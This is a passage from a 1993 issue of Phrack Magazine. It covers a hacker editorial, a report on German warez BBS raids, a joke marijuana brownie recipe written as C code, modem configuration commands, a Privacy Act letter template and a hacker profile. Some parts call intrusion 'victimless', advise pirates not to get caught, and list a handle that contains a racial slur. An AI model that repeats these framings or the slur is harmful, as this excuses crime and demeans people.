- and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
- An interesting thing I've heard about SWBNET, and about every other subnet
- arranged by Tymnet, is that the information concerning gateways, utilities,
- locations of node code, etc., is purported to be located in various
- places throughout Tymnet internal systems. One such system, was described
- to me as a TYMSHARE system that contained data files outlaying every subnet
- on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
- and the ONTYME II mail access keys.
-
- If this information is correct, then shouldn't Tymnet be called in to
- acknowledge their role in the attacks on Southwestern Bell?
-
- Let's say a Realtor sold you a house, but told you that he would be keeping
- copies of all your keys so that he could help you with the maintenance.
- Some time later, you notice that a few of your books have been read, but
- nothing else is disturbed. Later on you notice that your tv is on and your
- bed is all messed up. A week later your stereo is gone. You set up a trap
- and catch someone going into your house with your own key! You find that
- the burglars had made copies of all the keys held by your Realtor. You
- then find that the Realtor neglected to put the keys in a safe, and in fact
- had left them lying around on the table in his back yard labeled with
- the addresses they corresponded to.
-
- Who would you be more upset with? The individual who copied and used the
- keys, or the Realtor for not providing the access to your valuables more
- vigilantly? I would personally be far more upset with the Realtor, for
- if he had put the keys in a safe this event would have probably never
- transpired.
-
- I'm not saying that people who get caught for breaking into computer
- systems should be let go, especially if they can be proven to be involved
- in the sale of hacked information for a personal profit. What I am saying
- that if hackers are to be punished so vigorously for what I view as a
- predominantly victimless crime, then everyone should have to line
- up and take their fair share of the blame.
-
- I think it's high time that the real blame be placed on the corporate
- entities who seemingly refuse to acknowledge their role in these
- break-ins. Neglect of duties and lack of responsibility on the part
- of the employees, the interconnect carriers, the data network providers,
- the hardware vendors, etc. all play a key role in the problems that
- exist in the world's data networks today. In fact, if it were not for
- computer hackers, these problems would continue to lie dormant until either
- discovered by accident in the field, or the provider decided to go ahead
- and illuminate its clients to the existence of such a problem.
-
- I wholeheartedly encourage each and every reader of Phrack to
- purchase one share of stock in any corporation you know that has exhibited
- such tendencies and take your place on the floor of the next shareholders
- meeting and scare the hell out of the board of directors.
- Phrack Magazine is calling a discount brokerage very soon.
-
- -------------------------------------------------------------------------------
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 2c of 14
-
-
- // // /\ // ====
- // // //\\ // ====
- ==== // // \\/ ====
-
- /\ // // \\ // /=== ====
- //\\ // // // // \=\ ====
- // \\/ \\ // // ===/ ====
-
- ******************************************************************************
-
- BBS Busts in Germany
- ====================
-
-
- Thursday, March 18, 1993.
-
- This day will be remembered as a black day in German BBS history.
- In fact, it was the blackest day in German BBS history since the raid
- of 18 Berlin BBS in Berlin and North Germany a couple of months ago.
-
- What has happened? A couple of Bulletin Board Systems (BBS) have
- been raided by the police. All these BBS had "warez" online, illegal,
- pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
- This time, most of these BBS were in Bavaria, South Germany.
-
- Now let's take a closer look at the events:
-
- One guy who got busted was MST, Sysop of Southern Comfort BBS
- in Munich. In fact, his board went offline 9 days before.
- But he was so unlucky still having his computer and his warez.
- He was even using his modem to trade warez at the very moment
- the cops rang his doorbell. Why did he go offline just so short
- before he got busted? His board had been running for over 1 year.
-
- Here is the text file MST released about going offline:
-
- THURSDAY 03-09-93 00:15
- THE SOUTHERN COMFORT BBS IS CLOSED !
- I AM NOT BUSTED OR ANYTHING LIKE THIS !
- I CLOSED THE BBS COS OF PERSONAL REASONS AND
- PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
- I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
- IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
- ALIVE AND WILL BE HERE AT A NEW??? OPENING !
-
- SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !
-
- MST/RAZOR 1911
-
- A couple of days later, MST was posting ads in local BBS to sell his
- old equipment. But obviously he wasn't fast enough. Maybe this was
- one of the reasons the cops busted him on March, 18. They were afraid
- he might get rid of his illegal software, so they hurried up to catch him!
-
- He got busted at 10am this morning. Three cops were knocking on his door,
- until he opened. They had a search warrant and confiscated all his
- computer equipment, disks, modems...
-
- Chris used to have a board until four months ago, and now trades for TDT and
- other groups. He was in school this morning. His parents weren't home
- either. So the cops broke into his house, smashed the wooden door, and
- seized all his equipment. He is asked to speak to the Police this Tuesday.
-
- Chris used to be one of the most active traders for PC warez in Germany.
- He and his friend Michelangelo supported boards like Schizophrenia and
- Beverly Hills, which they co-sysop'ed. They were also known as the
- 'Beverly Hills Boys', a new German cracking group.
-
- After Chris' bust, a couple of boards were affected:
- Beverly Hills went offline. Also the German Headquarters of the Beverly
- Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least
- 1-3 months offline time.
-
- The other Munich BBS and their sysops were really scared after the bust
- and took down their systems for an uncertain amount of time.
-
- One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
- every warez collector. It had 8 modems hooked up (all US Robotics Dual
- Standard 16.8) and one ISDN Line.
-
- It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
- would be put online according to user' requests.
-
- But then, March 18 arrived, and the dream was shattered.
- Its sysop, Rider, who was happily calling boards the previous day,
- had the most shocking experience in his life. The cops came and
- took his BBS.
-
- And more..
- Ego, co-sysop of a large German BBS, got busted.
- Andy/Spreadpoint (ex-sysop) got busted.
- And lots of others...
-
- Unlike the US Secret Service, which delights in seizing all
- electronic equipment, like stereos, TVs, VCRs, the German cops
- were just after the computer hardware, especially the hard drives
- and file servers.
-
- They usually come with three or four people. All of the search warrants
- they were using were quite old, issued last December.
-
- Who is behind those actions?
- First of all the BSA, Business Software Association. They
- were also responsible for the recent raids of US Bulletin Boards.
- In Germany they just announced actions against piracy and
- bulletin boards. The most active BSA Members are Microsoft and
- Lotus Development. Microsoft, Lotus and the BSA are all located
- in Munich, Germany, home of German's most feared lawyer,
- Guenther Freiherr von Gravenreuth. This guy has been fighting
- for years against piracy, young kids who copy games, and especially
- bulletin board systems. He is also affiliated with Ariolasoft, a huge
- German distributor for game labels like Activision and others.
-
- In the end, all I can say is:
- Be aware, don't get caught and don't keep illegal stuff on your board!
-
- (c) 1993 SevenUp for Phrack
-
- ******************************************************************************
-
- Carlcory's brownies:
-
- /* Begin cc_brownie.c */
-
- Includes:
- #include "4_squares_baking_chocolate"
- #include "1_cup_butter"
- #include "2_cups_sugar"
- #include "4_eggs"
- #include "2_cups_flour"
- #include "2_tbs_vanilla"
- #include "1_third_cup_marijuana" /*comment out if won't compile
- on your system*/
- #include "1_cup_nuts" /*comment out if won't compile*/
-
- void main(void);
-
- {
- heat(oven, 350);
- add(butter, chocolate);
- while(texture!='smooth') {
- stir(mixture);
- }
- Add(sugar);
- add(eggs);
- add(vanilla);
- add(flour, pot);
- add(nuts)
- for(timer=0; timer<35; timer++) {
- bake(mixture);
- }
- cool(hour);
- }
-
-
- /*The high takes about an hour to come on,
- but lasts for 12 hrs. (4 brownies)
- Make sure they cool (don't burn your mouth!)
- and share with friends! */
-
-
- /*End of cc_brownie.c*/
-
- ******************************************************************************
-
- GRAY AREAS
- Examining the Gray Areas of Life
-
- Gray Areas, Inc.
- P.O. Box 808
- Broomall, PA 19008-0808
- (215)353-8238
- grayarea@well.sf.ca.us
-
-
- Gray Areas is published quarterly and printed on recycled paper. They also
- participate in local recycling efforts involving cans, glass, clothing,
- newspapers, and more.
-
- A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
- funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may
- purchase a twelve issue subscription and give 4 or 8 or those issues away as
- gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
- recipients). Make check or money order out to Gray Areas, Inc.
-
- STATEMENT OF PURPOSE:
-
- Gray Areas exists to examine the gray areas of life. We hope to unite people
- involved in all sorts of alternative lifestyles and deviant subcultures. We
- are everywhere! We felt that the government has done a great job of splitting
- people up so that we do not identify with other minority groups anymore. There
- are so many causes now that we often do not talk to others not directly
- involved in our chosen causes. We believe that the methods used to catch
- criminals are the same regardless of the crime and that much can be learned by
- studying how crimes in general are prosecuted and how people's morals are
- judged. It is our mission to educate people so they begin to case more about
- the world around them. Please join our efforts by subscribing, advertising your
- business with us, and by spreading the word about what we're up to.
-
- __________________________
-
- Review by Knight Lightning:
-
- I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
- and with a cover price of $4.50 (US). I was impressed with both the laser
- quality of the printing, artwork, and graphics, as well as the topics and
- content of the articles.
-
- I would not characterize Gray Areas as a hacker magazine, but the subject did
- come up in an interview with John Perry Barlow (one of the original founders of
- the Electronic Frontier Foundation) where he discussed the EFF and its role in
- defending civil liberties.
-
- No, instead I think it is safe to say that Gray Areas pays a lot of attention
- to the Grateful Dead. Indeed the cover story is titled "Grateful Dead
- Unauthorized Videos." Additionally, there are several other articles
- (including the John Barlow interview) that discuss varying aspects about the
- Dead's history, their politics, and of course their music. An advertisement
- for the next issue of Gray Areas reveals that even more articles relating to
- the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
- fall in love with this magazine!
-
- However, the article that I appreciated most was "Zine Scene," a review of 163
- alternative newsletters that included such familiar names as 2600, Hack-Tic,
- Full Disclosure, and TAP; and others that I intend to take a look at like Iron
- Feather's Journal and bOING bOING. The zines reviewed here covered every topic
- imaginable and I thought it was a great buffet for the mind to have such handy
- directory (especially since Factsheet Five went defunct about a year ago).
-
- Other interesting articles had to do with video, audio, and software piracy and
- reviews of music and software. I also enjoyed the great artwork found
- throughout the magazine in the form of visual aids, comics, and advertisements.
-
- If you are a fan of alternative music or the Grateful Dead, you'll be very
- sorry if you don't subscribe immediately. If you are interested in alternative
- publications with more interesting points of view than Time or Newsweek then
- you owe it to yourself to at least purchase a copy to check it out.
-
- - - - - - - - - -
-
- All letters sent to Gray Areas are presumed to be for publication unless you
- specifically request that they omit your name or refrain from publishing your
- comments. If you are writing about something which could incriminate yourself,
- they will protect your identity as a matter of policy.
-
- ******************************************************************************
-
- "Turning your USR Sportster w/ 4.1 roms
- into a 16.8K HST Dual Standard"
-
- by
-
- The Sausage with The Mallet
-
-
- If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
- the following commands to it to turn it into an HST 16.8K dual standard.
- In effect, you add HST 16.8K to its V32.bis 14.4k capability.
-
- ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
- atgw03c6,22gw05cd,2f
- ats14=1s24=150s26=1s32=8s34=0x7&w
-
- A very important item is the b1, which tells the modem to use
- the 16.8K HST protocol. If you do not set b1, when the Sportster
- connects with another V32 modem it will go through the CCITT v.32
- connect tones and you will not get a 16.8K connect.
-
- If you do get an HST connect, you will not hear the "normal"
- train phase--instead you will hear the HST negotiation which
- sounds like a 2400 baud carrier.
-
- Finally, if you change the "cd" in the second line to a "cb", your
- modem will think it is a V.32 Courier instead of an HST 16.8K.
-
- Look for other pfine pfiles from Rancid Bacon Productions in conjunction
- with USDA Grade A Hackers (UGAH.) Accept no substitutes.
-
- *******************************************************************************
-
- Request to Post Office on Selling of Personal Information
-
- In May 1992, the US Postal Service testified before the US House of
- Representatives' Government Operations Subcommittee that National Change of
- Address (NCOA) information filled out by each postal patron who moves and
- files that move with the Post Office to have their mail forwarded is sold to
- direct marketing firms without the person's consent and without informing
- them of the disclosure. These records are then used to target people who
- have recently moved and by private detective agencies to trace people, among
- other uses. There is no way, except by not filling out the NCOA form, to
- prevent this disclosure.
-
- This letter is to request information on why your personal information
- was disclosed and what uses are being made of it. Patrons who send in this
- letter are encouraged to also forward it and any replies to their
- Congressional Representative and Senators.
-
-
- Eligible requestors: Anyone who has filed a change of address notice with
- the Postal Service within the last five years.
-
-
-
- Records Officer
- US Postal Service
- Washington, DC 20260 PRIVACY ACT REQUEST
-
-
- Dear Sir/Madam:
-
- This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
- requires the Postal Service, as a government agency, to maintain an
- accounting of the date, nature, and purpose of each disclosure of
- information about individuals. I request a copy of the accounting of all
- disclosures made of address change and mail forwarding information that I provided
- to the Postal Service. This information is maintained in USPS System of
- Records 010.010.
-
- On or about (date), I filed a change of address notice requesting that my
- mail be forwarded from (old address) to (new address). The name that I used
- on the change of address form was (name).
-
- This request includes the accounting of all disclosures made by the Postal
- Service, its contractors, and its licensees.
-
- I am making this request because I object to the Postal Service's policy of
- disclosing this information without giving individuals an option to prevent
- release of this information. I want to learn how my information has been
- disclosed and what uses have been made of it. Please let the Postmaster
- General know that postal patrons want to have a choice in how change of
- address information is used.
-
- If there is a fee in excess of $5 for this information, please notify me in
- advance. Thank you for consideration of this request.
-
-
- Sincerely,
-
-
-
- CC: Your Congressional Representative
- US House of Representatives
- Washington, DC 20510
-
- Your Senators
- US Senate
- Washington, DC 20515
-
- -------------------------------------------------------------------------------
-
-
-
- =Phrack Magazine=
-
- Volume Four, Issue Forty Two, Phile 3 of 14
-
- ==Phrack Pro-Phile==
-
- _______________________________________________________________________________
-
- Phrack Pro-Phile was created to provide info to you, the users, about old
- or highly important/controversial people. This month, we introduce you
- to an individual who has survived the underground for far too long,
- the creator of Phantom Access and one of the co-sysops of Mindvox...
-
- Lord Digital
- ~~~~~~~~~~~~
- _______________________________________________________________________________
-
- Personal
- ~~~~~~~~
- Handle: Lord Digital (for like.... fuck I'm old, 13 years now)
- Call him: Patrick K. Kroupa
- Past handles: M000hahahahahahahah! You're kidding right?
- Handle origin: It was given to me by this ancient wise man drinking
- cheap Absolut by the side of the road...
- Date of Birth: 01/20/68
- Age at current date: 24
- Height: 6'2"
- Weight: 185
- Eye color: Green
- Hair Color: Blonde/brunette/black (subject to change)
- Computer: Apple ][+, Amiga 1000, Mac Plus (All in storage)
- Apple //e, Amiga 500, NeXT, Various Suns (Not in storage)
- Sysop/Co-Sysop of: MindVox ELItE!@#!!!@#!
- Net address: digital@phantom.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- If you look beneath the shiny surface of most things, and gaze way-way-way
- deep down into the murky black festering heart of the human evolutionary
- process, you are ultimately confronted with the revelation that has stood, nay,
- LEAPT UP before the ancients since before the days of Atlantis: Life is a lot
- like NeW WaReZ.
-
- Anybody who tried to tell you something different, is obviously selling
- you something.
-
- All things in this universe -- and many others -- can be attributed to New
- WareZ. The ebb and flow of WareZ is what keeps the very COSMOS from bursting
- apart at the seams. During periods of time when the flow of WareZ slows to a
- trickle, times are tough, there is war, pestilence, death, disease, and many
- rAg PhIleZ. d()oDZ who were happily playing Ultima XXII Quest For Cash, are
- soon busily hurling insults at each other and dialing the Secret Service. Life
- is grim, there is a bleak sense of desolation and emptiness . . . for when the
- WareZ slow down . . . there is little left to live for and you begin to enter
- withdrawal. An ugly process that, thus far, has only been combatted
- successfully by Wally Hills NeW WhErEZ Treatment center, where they slowly ween
- you off the addiction of WareZ and introduce you to the REAL WORLD where you
- can do things like smoke crack and play in a band.
-
- On the flipside, when there is a good steady flow of WaReZ, the universe
- hums to itself in happiness and all wrongs are righted, perspectives
- re-adjusted, and peace, love, and happiness spread throughout the land as the
- COSMOS re-aligns itself and perfection sweeps the world. This is a heady time,
- but one that is sure to be brief, for before you know it some evil glimmer of
- BADNESS will rise up and somebody will DOUBLE-RELEASE someone else, or a Ware
- will CRASH when it tries to load . . . and then it's just all over.
-
- A long time ago in a galaxy far, far away . . . I was a founding member of
- the Knights Of MysterIous keYboArdZ and the Ko0l/Ra{> alliance. At present I
- am President/Ce0 and Chairman of the b0red at Phantom Access
- Technologies/Coleco ADAM design Studios, Inc.
-
- At the moment our group is working on a multi-tasking, multi-user,
- CyberSpace environment where the participants can take part in a shared reality
- that is based upon a cross-relational structure comprised of lots of 0's and
- 1's all strung together in big twisty chains and kept track of by an
- Objective-COBOL X/Motif GUI sitting on an SQL dialed into the POWER COMPUTER in
- Utah, at infinite baud (not to be confused with bps).
-
- In the near future I .plan to move to Pigs Knuckle Idaho and cross-breed
- weasels with ferrets, while devoting the rest of my life to watching daytime
- TV.
-
- It's just that type of thing.
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-
- Reality Break
- ~~~~~~~~~~~~~
-
- It is very difficult, bordering on impossible, for me to remain serious
- for longer than about 45 seconds, when discussing the "underground" and what it
- was all about.
-
- I rarely bother to mediate or water-down most of my opinions, and there
- are a lotta places out there in the real world, where anyone who cares can
- readily access whatever I have to say. There isn't a great deal left for me to
- convey to anybody regarding my perceptions of the hack/phreak world's history
- and what it has meant, and shall mean, in the cosmic scheme of things.
-
- The first time I came into direct contact with computers was during the
- mid-late 70's. I was around 6 or 7 and my father worked at NCAR during this
- period of time, which is a futuristic looking series of buildings in Boulder
- Colorado. This one time I came in, there were all these weird cars driving
- around in the parking lot, and since there were frequently a lotta strange
- things moving around there, I never understood until much later that Woody
- Allen was filming SLEEPER when this was going on. On the same day, I was shown
- some of the computer rooms, which had just taken shipment on one of the first
- Crays to go out the door. This left an impression. It was neato . . .
-
- One thing led to another. I played around with various things, mainly the
- really old Commodore PET systems and a slew of heavy metal junk from IBM, until
- I got an Apple ][+ in 1978. I hung out with a group of people who were also
- starting to get into computers, most of them comprising the main attendees of
- the soon-to-be-defunct TAP meetings in NYC, a pretty eclectic collection of
- dudes who have long since gone their separate ways to meet with whatever
- destinies life had in store for them. Around 1980 there was an Apple Fest that
- we went to, and found even more people with Apples and, from this, formed the
- Apple Mafia, which was, in our minds, really cool sounding and actually became
- the first WAreZ gRoUP to exist for the Apple ][.
-
- Time passed, I picked up more hardware, went on the quest to assemble the
- perfect Apple-Cat system -- consisting of the Cat, 212 card, BSR, firmware,
- tone decoder chip, and all the m0dZ NOVATION eventually made to the boardZ --
- and ultimately ended up with 3 of 'em, one of which still works (like wow).
- This led to the first generation of Phantom Access programs which started to
- seep into the moDeM WeRlD around 1983, with the final revisions being let loose
- in 1987 or 1988, under the auspices of Dead Lord. By this time I had long
- since stopped working on them and had relatively little to do with their forms
- of release.
-
- Over the years I've been in a seemingly-endless succession of groups and
- gatherings under nearly 50 different pseudonyms which were frequently invented
- and dropped, all around that one specific timeslice and reference-point. There
- were only two that I was ever "serious" about, which is to say I entered into
- them honestly believing the ideals and reasons for the group's inception, to be
- valid and worth upholding and being a part of. In other words I was in my
- mid-teens and my attitude wasn't one of "Yeah yeah, take 10; a buncha dudes are
- gonna screw around, some of it will be fun, some of it will be silly, and a lot
- of it will be bitchy and cranky, but hey, I'm only here to amuse myself, so
- what the fuck . . ." The two "serious" affiliations were Apple Mafia and the
- Knights of Shadow. KOS ceased to exist in mid-1984 and I dropped out of the AM
- around 1985, although to my knowledge it kept going until '86 or '87 when the
- last surviving members found better things to do with their time. In 1987 I
- was also "OfFphICiALlLY" inducted into the Fraternal Order of the Legion of
- Doom, which was just gosh w0wz0. Actually, it's much more fun in retrospect,
- since most of us are pretty good friends at this point in time, which seemed an
- unlikely event back in the early 80's <giGgLE!!@#>
-
- I ceased to be "active" sometime around 1985, having gained legal access
- to almost anything I could possibly want to play with, as well as having made
- friends with people working for NYNEX who de-mystified many things for me. The
- ultimate conclusion to all of this was that having THE POWER is cool -- and
- using it to annoy people was absolutely hilarious -- but only led to two
- possible destinations.
-
- You use it all as a learning experience and "grow up" realizing that
- you're playing cops and robbers, and many of the things you have spent years
- doing are now illegal and liable to get you into a lot of trouble. You can't
- go back in time (at least not yet).
-
- You could keep doing stupid things and end up in a legal dilemma over
- something that isn't very important. Because . . . it really isn't "THE
- POWER," it's just a very limited form of "it" embodied by a phone system and
- some computers. And when you compare that to a piece of art, or a collection
- of music, or a new series of programs that someone has created, you begin to
- realize that all you're doing is fucking with things that other people made,
- and you're wasting your time abusing . . .
-
- To cut short my rant, I have no moral judgements to pass upon anyone or
- anything, because whatever it is that people do, it's some sort of learning
- process leading towards their destination (whether they realize it or not).
- The computer underground is just not a place where you can remain "active"
- beyond a certain period of time that serves as a sort of "rite of passage"
- towards that something else. To hang around indefinitely and remain "active"
- is to become a criminal.
-
- Almost everything I've done has taken place with a handful of friends who
- played various roles in events that transpired -- primary among them Dead Lord
- (Bruce Fancher), one of my closest friends for the better part of a decade, as
- well as The Unspeakable One whose name cannot be mentioned for to do so causes
- rifts within space/time, and a buncha dudes from NYC/NJ who for the most part
- want to blip their personas off the face of Cyberspace and get on with their
- lives without the specter of LaW EnForCEmEnT hanging over them for doing silly
- things as teenagers.
-
- In 1986 I ceased calling anything and didn't access a computer that was
- hooked into a modem until late 1990. As of late 1992, I have been "retired"
- for a little over 7 years.
-
-
- Patrick's Favorite Things
- ~~~~~~~~~~~~~~~~~~~~~~~~~
- Women: Delia! Gorgeous, Intelligent, Wonderful, & able to deal with me.
- Men: Bwooooce.
- Cars: 928s4, Hyundai, Edsel.
- Foods: Italian, red meat, SuPeR Hi PER Pr0tE!n, anything with SPAM.
- Music: Any band with the word "LORD" in it (Lords of the New Church,
- House of Lords, Lords of Acid, Lords of Chaos, Traci Lords).
- Authors: Michael Moorcock, Sun Tzu, Machiavelli, Hans Horbiger, Dr. Seuss.
- Books: Play of Consciousness, The Book of PAT.
- Performers: Bill the Cat, Sting, Perry Farrell, GuNz N RoSeZ, plus anybody
- who has sold out to the mahnnnnnn fo' $$$$$$$ in a biiiiiig way.
-
-
- Most Memorable Experiences
- ~~~~~~~~~~~~~~~~~~~~~~~~~~
- Most memorable things are unmentionable and destined to stay that way for
- a while. Those who played the games know the stories; those who didn't
- eventually will -- but like, who cares. Everybody should live their own
- stories, life's an interesting game . . . go play.
-
-
- Some People to Mention
- ~~~~~~~~~~~~~~~~~~~~~~
- Dead Lord - The one who is not and can never be, yet exists. Solely an
- infinite layering of the possibilities inherent within
- personal transmigration and biotechnology? Or alive, with
- flesh, blood, bone and an adornment of k0dEz & warEZ? You
- must not be blinded by sight, nor fooled by what things
- appear to be when they are not, for what is a man when he
- has not the latest, nor possesses the abilities to acquire
- same? This is a question perhaps best left to the wise men
- who roam the meadows of the ozone, forever catching the
- edge and surfing the waves cresting upon the seas of
- thought and what is, was, and shall always be.
-
- The - I know who you are, so tell me who I am, and let's just
- Unspeakable get on with it okay? Because otherwise, TV is likely to
- One drop the entire facility dead. Anyone of normal caliber
- can see that to be entirely obvious to thee of the id'ness
- of pole-cats watching Star Wars. 8+ KlUb ElYtE.
-
- Terminus - A good friend over many years who, as most people know, has
- recently gone through a lot. The future looks bright, and
- I look forward to looking back on all this with you in
- another ten years. [Look, look, looking] (haga!)
-
- Magnetic Surfer - Neato guy who knew me way-back-when, and used to give me
- gNu Apple wArEz on cassette tape which he had downloaded at
- the lightning speed of 300 baud. Also provided a means to
- meeting many of my friends, via Sherwood Forest, when it
- first existed and hosted Inner Circle and later KOS.
-
- The Phantom - See above, also gave me a full set of TAP copies in 1983,
- which I never returned to him.
-
- The Plague - A cool guy, close friend before his fatal accident when
- the truck went off the road near Poker Flats, just 5 miles
- north of Pig's Knuckle, ID. Tragic, hope he's happy in
- his new home, far, far underground, running the world's
- first afterlife/subterranean BBS.
-
- ApPul HeyD! \ The elYtE peARz of Scepter/InterCHAT who went on to form
- SuperNigger > - DPAK, an entity SO ELITE that it required FOUR letters for
- Sharp Rem0b / its acronym & brought the world Lex Luthor on HBO!
-
- SuperNigger - Because he is 2 elyTe to be encompassed in merely one
- line and requires at least two.
-
- Lord_foul - Ahhhh do0d.... Well we all have our roles 2 play. Catch
- ya in tha outback. (cha mod pla foul sl=999 mi=99,mh=99)
-
- Ninja NYC - One of the few people I have ever met who seems to have
- mastered the art of being happy wherever he is, doing
- whatever he happens to be doing. An exceptionally nice
- human being.
-
- Elven Wizard \ A collection of compatriots, cohorts, and all around dudEz
- The Infiltrator\ with whom I had an inordinate amount of fun, first ro0l!ng
- The Gunslinger > - the WhEReZ world, then changing our handles (well except
- The Bishop / for Jeff) & dismantling eliteness and its tarnished allure,
- The Gonif / along with its cadre of false prophets (namely ourselves
- under half a dozen other handles).
-
- Andrew \ "I doan' wannnnnnnnnt any money, I want to be left alone,
- Chase > - tell them to go 'way." May Sutekh look upon our worldly
- Asif / endeavors and bless us all, everyone. !nse<t01dZ ro()l!!@
-
- Paul Muad'Dib - A lotta fun, although he never did have any new wares
- (unless you count source code). In any case, I guess it's
- not too relative any more.
-
- Tuc - I think it's a requirement to mention Scott; far be it from
- me to break with tradition. Hi Tuc! Thanks for the ride!
-
- Captain Avatar - He had 'em Ahllll! ALL of them... MORE THAN all of 'em....
-
- Napoleon Bonaparte- Nappy ran Securityland. I called it, it was cool. It made
- me smile. I guess it made the FBI smile too.
-
- Mr. Xerox - Mike was usually witty, sarcastic, annoying, egotistical,
- obnoxious, and almost always late. We got along great
- and I really miss the guy sometimes. Hullo Mike, wherever
- you may roam.
-
- Taran King - BesideZ DeYd L0rD & Sn, the El1teZt Pers0[\] eYe EveR meT!
- StaY sP!fpHY [>o()d!
-
- Phantom Phreaker - Here's to shifting focus and finding something far more
- interesting to play with than phones & computers 8-). It's
- an amazing universe, huh . . .
-
- Lex Luthor - After a ten year period during which we typed to each other
- once in a while and seemed situated at antipodean sides of
- the m0dUm Yo0n!veRsE, I finally met with Lex in the very
- near past. It's shocking to find that he's actually one of
- the most gracious, funny, and pleasant guys I've ever had
- an opportunity to meet. Best wishes in whatever you may
- end up doing!
-
- Erik Bloodaxe - A keg of Sandoz, a Vat of pig's blood, T&C and thee.
-
- Sigmund!@31!@!!! - As the UFOs said, they know who you are, they know where
- you are. Seriously, hey, it was entertaining. Good luck
- man.
-
-
- unReAl PeOpUL 2 MenShun
- ~~~~~~~~~~~~~~~~~~~~~~~
- StJude - For everything. It's good to know you . . . love, light, and a
- lotta deep-fried giri with ciphers thrown in.
-
- Siva - Look, polygons or voxels, Gibsonian or Post-modern, by Risc or by
- Cisc with Objective C++ running Smalltalk under Windows NT over the
- underpass and around the bend; it's gonna happen, and we're gonna be
- there having a party. Smile, as I think you've mentioned on more
- than one occasion; it's an interesting time to be alive 8-).
-
- Bruce - Quite possibly the coolest grown-up I have ever met 8-). Which is
- Sterling saying a lot. The world would be a much better place if Bruce
- could be cloned and then placed inside a tornado, hooked into a
- net, fitted with an adamantium exoskeleton, and then dropped into
- the de-criminalized zone with a BigMac and a holographic tape
- recorder.
-
- Jim - Hey so, are you doing more things at once or am I? I bet I can
- Thomas watch TV, listen to music, have three phone conversations, and
- write an article with 25% greater coherence than Chuck has while
- eating and watching TV. On the other hand, writing two books,
- teaching, reading, running CUD, having a life, and still finding
- time to hang out are at least level 15 -- haven't hit that yet,
- but I'm working on it!
-
- Andy - Hey man. I enjoy what you're doing, keep the faith, ignore the
- Hawks assholes, take inspiration from the inspired, and retain belief
- in your dreams. Oh okay, gotta go, time to sell out, ignore what I
- just said 8-).
-
- 3Jane - Models/actresses/sex cadets united for a better tomorrow, under
- Unix with named_pipes and justice for some of us.
-
-
- Memorable Phreak/Hack BBSes
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
- 8BBS - Long ago, I didn't understand it, or what I was typing, but it was fun.
- MOM - Long ago, although by now I did understand it and had slightly less fun.
- Pirate's Harbor - Before Norman figured out he could make a killing on TIMECOR.
- Pirate's Chest - 6 line 80 meg board circa 1983. Totally Cool.
- Adventurer's Tavern - Last bastion of tremendous on-line fun & anarchy. RIP.
- Securityland - Nappy's Board.
- Pirate's Phunhouse -> Cat's Cavern - The Tempest's system(s).
- Dark Side of the Moon - Through many long and strange phases. Still running.
- RACS III - w()wZ0 blargel blumpfk0l SwillY sw()nk!@!#!@!!!!!
- OSUNY (3 cycles) - Some more fun than others.
- Sherwood Forest I, II, III - Liked all three, although 1 was the coolest.
- Plovernet - Two phases. Both great.
- The (urse - WarEZ do()d & eLIteNEsS Galore!@#!@#!@#!@#
- LOD - The Start in 1984, and intermittently thereafter.
- COPS - Cool Florida board.
- Shadowland - Cool Colorado board.
- SpecELITE - So overwhelmingly awful, that it was wonderfully fun.
- WOPR - Lotta fun for a while, then he threw everyone off & went 1200only wareZ.
- Pirate-80 - It was very effervescent with a touch of jello.
- Everything Sir Knight ever ran - Too many names (Tele-Apa, HackNet, NewsNet...)
- World of Cryton - WOC! JAMES! ELITENESS!
- The Safehouse - Apple Bandit's. Hey, I want my Diskfer ][ dude!
- Farmers of Doom - Blo0p.
- Pirates of Puget Sound - Nice softwareZ. Lotta fun.
-
-
- A few things Lord Digital would like to say:
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- BELIEVE EVERYTHING THAT YOU HEAR. KNOW EVERYTHING YOU SEE. UNDERSTAND
- EVERYTHING YOU DO NOT COMPREHEND. BE AT ONE WITH THE STILLNESS OF THE
- REVOLVING HAMSTER WHEEL AND FLOSS BETWEEN MEALS.
-
- As far as the future of the hack/phreak world and telecommunications in general
- is concerned, the PhrAck World is absolutely spiffy and I believe that ISDN
- will change EVERYTHING and make it rounder, taller, bigger, more stable, and
- also give later generations something to look back upon and sneer at with
- contempt.
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 4 of 14
-
- Prelude to a Kiss
-
- - Lessons Unlearned Are Doomed To Bring Misery Ad-Infinitum -
-
-
- The following is an article I wrote for a mainstream computer security
- periodical called ISPNews. At the time, I had been discussing the idea
- of a bi-monthly column with the editor at that time, Len Spitz. (Now the
- editor is Michael Alexander, ex-of Computerworld)
-
- The following article, although very, very tame by my standards, and
- admittedly lacking in enough hardcore information to help security
- professionals to apply a quick fix to their many problems, caused quite
- a stir among the folks at ISPNews.
-
- Since this article was from me, a self-proclaimed hacker, it
- underwent an extraordinary amount of scrutiny. Rather than be
- accepted or denied by the editor, my article got the dubious honor of
- being sent before an editorial advisory board. I checked every back
- issue of ISPNews and could find no mention of such an entity until the
- November/December 1991 issue, the issue immediately following an length
- interview with none other than myself.
-
- When I questioned Len Spitz about this rather odd fact, he maintained
- that this committee had indeed existed, but stammered his way through my
- question to name any other article that they had convened to judge in
